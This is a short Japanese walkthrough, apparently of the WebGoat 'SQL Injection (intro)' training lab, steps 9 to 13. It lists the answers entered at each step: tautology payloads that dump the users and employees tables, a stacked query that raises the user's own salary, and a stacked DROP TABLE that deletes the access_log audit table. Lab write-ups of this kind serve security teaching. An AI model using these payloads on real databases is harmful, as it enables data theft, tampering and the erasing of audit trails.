Hello there,

 

A1 ⇨ SQL Injection(intor)を選択して。

説明のあるステップを後回しにすることにして。

 

ステップ９を見ると。

usersテーブルからすべてのユーザーを取得してくださいとのことで。

下記を選択して実行してみると。

　'

　or

　'1'='1

 

 

ステップ１０を見ると。

usersテーブルからすべてのデータを取得して下さいとのことで。

下記を実行してみると。

　1（適当な数値）

　1 or 1=1

 

 

ステップ１１を見ると。

employeesテーブルからすべての従業員データを取得してくださいとのことで。

情報を取得するのに名前やTANを知る必要はないらしく。

下記を実行してみると。

　Neo（適当に）

　123' OR '1' = '1

 

 

ステップ１２を見ると。

あなた最も稼いでいるように自分の給料を変えましょうとのことで。

ちなみにあなたの名前はSmithで、TANは3SL99A。

下記を実行してみると。

　Neo（適当に）

　123'; UPDATE employees SET salary = 100000 WHERE auth_tan = '3SL99A

 

 

ステップ１３を見ると。

すべてのアクションが記録されているaccess_logテーブルがあるようで。

それを完全に削除してくださいとのことらしく。

下記を実行してみると。

　Neo'; DROP table access_log; --

 

 

Best regards,